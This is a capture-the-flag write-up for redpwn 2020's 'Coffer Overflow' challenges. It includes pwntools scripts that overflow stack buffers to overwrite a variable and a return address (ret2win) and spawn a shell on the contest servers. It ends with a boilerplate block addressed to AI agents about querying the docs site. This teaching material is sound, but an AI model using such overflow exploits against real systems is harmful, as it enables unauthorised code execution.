# Coffer Overflow

## Coffer Overflow 0

Read source, there's a code var.

It's set to 0. At the end, if it's not 0, a shell is popped.

Pretty simple chall, just spam chars and a shell pops, cat flag.txt

## Coffer Overflow 1

Same thing, except code must be 0xcafebabe.

Let's disassemble main, we'll find the difference between our input(rbp-0x20) and the var(rbp-0x8) is 24 bytes, so send 24 bytes + p64(0xcafebabe)

```python
from pwn import *
#p = process("./over0")
p = remote('2020.redpwnc.tf', 31255)
NUM_TO_VAR = 24
payload = b'A' * NUM_TO_VAR + p64(0xcafebabe)
p.sendline(payload)
p.interactive()
```

## Coffer Overflow 2

ret2win exploit. There's a function called binFunction.

Our input is at rbp-0x10, so 0x10 + 8 bytes until return address.

Overwrite return address with address of binFunction, which pops a shell.

```python
from pwn import *
e = ELF("./over2")
NUM_TO_RET = 0x10 + 8
padding = b'A' * NUM_TO_RET
retgadget =  0x000000000040053e # ret
payload = flat(padding, retgadget, e.symbols['binFunction'], word_size=64)
#p = e.process()
p = remote('2020.redpwnc.tf', 31908)
p.sendline(payload)
p.interactive()
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-winrars.gitbook.io/writeups/2020-writeups/redpwn-ctf/pwn/coffer-overflow.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.